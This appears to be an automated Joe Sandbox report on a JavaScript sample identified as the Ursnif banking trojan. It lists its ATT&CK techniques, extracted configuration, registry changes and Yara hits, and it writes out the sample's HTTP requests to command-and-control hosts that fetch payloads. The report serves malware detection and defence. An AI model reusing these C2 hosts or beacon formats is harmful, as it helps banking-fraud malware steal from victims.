Loading ...

Play interactive tourEdit tour

Analysis Report my_presentation_o6y.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:220655
Start date:06.04.2020
Start time:22:20:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 47s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:my_presentation_o6y.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winJS@19/18@4/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 67.27.159.126, 8.241.122.126, 8.248.123.254, 8.241.123.126, 67.27.157.126, 92.123.7.209, 152.199.19.161
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 5256 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation2Winlogon Helper DLLProcess Injection512Masquerading11Credential DumpingVirtualization/Sandbox Evasion2Remote File Copy3Email Collection1Data Encrypted1Multi-hop Proxy1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaCommand-Line Interface1Port MonitorsAccessibility FeaturesSoftware Packing2Network SniffingProcess Discovery2Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesPowerShell1Accessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion2Input CaptureApplication Window Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScripting2System FirmwareDLL Search Order HijackingProcess Injection512Credentials in FilesSecurity Software Discovery11Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution1Shortcut ModificationFile System Permissions WeaknessScripting2Account ManipulationFile and Directory Discovery1Shared WebrootData StagedScheduled TransferConnection Proxy2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSystem Information Discovery23Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskDLL Side-Loading1Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionConnection Proxy2Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: regsvr32.exe.5652.4.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "300", "system": "e1aacfc175c0ccc76580dfb2735a8c76hh-", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586236904", "user": "31b341dd54c8a3b79c4b2eb58a414dc9", "hash": "0x43f98375", "soft": "3"}
Multi AV Scanner detection for domain / URLShow sources
Source: f1.pipen.atVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\TAvvi.txtVirustotal: Detection: 15%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\TAvvi.txtJoe Sandbox ML: detected

Cryptography:

barindex
Public key (encryption) foundShow sources
Source: explorer.exe, 00000011.00000002.1204600072.0000000005BE0000.00000004.00000001.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Found Tor onion addressShow sources
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: api10.dianer.at
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /api1/olUj7VUg1W3_2B/Cm5em_2FIcoskF811yIlL/i5nyfJyOrsWaXAKa/wBuJs4wlgM_2BIy/t7o6sF4_2BEpb09e9D/e5ZukIG8o/FlemDlH5hm_2F_2BFN0s/2ZhIljtSaDFHSFEhyew/jBOrkKF_2FTTlaXJ3G7bcb/cK8SP8_2BRVIR/lu4YunYb/C7Y1WSSkLn2bCWF59L8cx45/SfuRwGoB6R/TJl48VgwKcXEC54Kl/Bzq0fT7_2FF_/2FQVuwY6mBp/UM3AQAfl6p2rLp/cMcs9TfWup_0A_0DRyv7X/E31Y4NNdfiq4NT8k/Gaeagtq3m74H3qK/lt2GxcKXxzzH0ftWw1/79Q1BmnDc/bht_2FB HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/8iQXGwCpzdKMz8g3/vR1Bs0PsJjWOKd0/CgIrsJRd_2BvCvUxkm/EXOKfEHNo/sYKGsI3cQNMqIc2s8Lkt/2WJiM46ejLxs3iANNJ9/h0d_2F80v8eQI71I9xW1ix/X25fj7vexiZHH/25toGcJ2/4qCC4KWagf38YJweMGTX2yy/g2VE2_2FE4/qml86HUU6i7BR1mLC/EYgG2gZ_2BJv/tirHghlS6iC/oeDlpjoTA6Q2pQ/XDM2St3rAcudiIsIc_2B9/FXw73bdttSLdvg_0/A_0DzW3gUjl_2Fr/YsYX0XolzoV8_2Fstv/ZS_2BgcF_/2FGwEtDMf1jKkxNFe920/LlyrF9mJyINdvtY/9G_2F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/fwo7DZYH_2BAKA9AO/nNoc7nnjpHEi/npqhf3GSHBr/v2V9gDEMWaip2f/WTZSyEKW70I6E_2BOGX8L/f1xas9w9a_2BQrc8/WmdaxoK73Rm87LL/JhJ_2FMMtqKcQxmhgf/S7RjNE9eu/brt07Jz86RaM4rk_2FBt/CORp_2BglkCLtmgMfGz/3bxYiCsOxAX38PGGPweCXx/7WraUC1th8DcB/U9IobK90/F0x_2BxxLQ9nLPSso3T1SD7/nbI9FZzdKq/iEddMW90JucsG5r6S/H_0A_0D7xk8S/3WhzWfKfGKz/j7q36j_2BqTV5s/7J_2FLYZ_2B1aW7EqQErh/D89Stq2I/FqlBS0nYVsijuN/m HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: api10.dianer.at
Found strings which match to known social media urlsShow sources
Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7f30eeac,0x01d60c9c</date><accdate>0x7f30eeac,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7f30eeac,0x01d60c9c</date><accdate>0x7f33635e,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7f3a9e16,0x01d60c9c</date><accdate>0x7f3a9e16,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7f3a9e16,0x01d60c9c</date><accdate>0x7f3d001e,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7f3dd1d1,0x01d60c9c</date><accdate>0x7f3dd1d1,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7f3dd1d1,0x01d60c9c</date><accdate>0x7f3dd1d1,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Apr 2020 20:21:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000011.00000002.1206555129.0000000007A37000.00000004.00000001.sdmpString found in binary or memory: http://api10.dianer.at/jvassets/xI/t64.dat
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/fwo7DZYH_2BAKA9AO/nNoc7nnjpHEi/npqhf3GSHBr/v2V9gDEMWaip2f/WTZSyEKW70I6E
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: msapplication.xml.7.drString found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000011.00000002.1206555129.0000000007A37000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: msapplication.xml1.7.drString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msapplication.xml2.7.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.drString found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: msapplication.xml5.7.drString found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: msapplication.xml6.7.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.drString found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5928, type: MEMORY

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5928, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: my_presentation_o6y.jsInitial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: TAvvi.txt.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winJS@19/18@4/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{2B0F9CCC-8EDA-95A0-F08F-A2992433F6DD}
Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{2F15FEE7-C2C0-3909-44D3-167DB8B7AA01}
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\BMV.MdUZxGcJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_o6y.js'
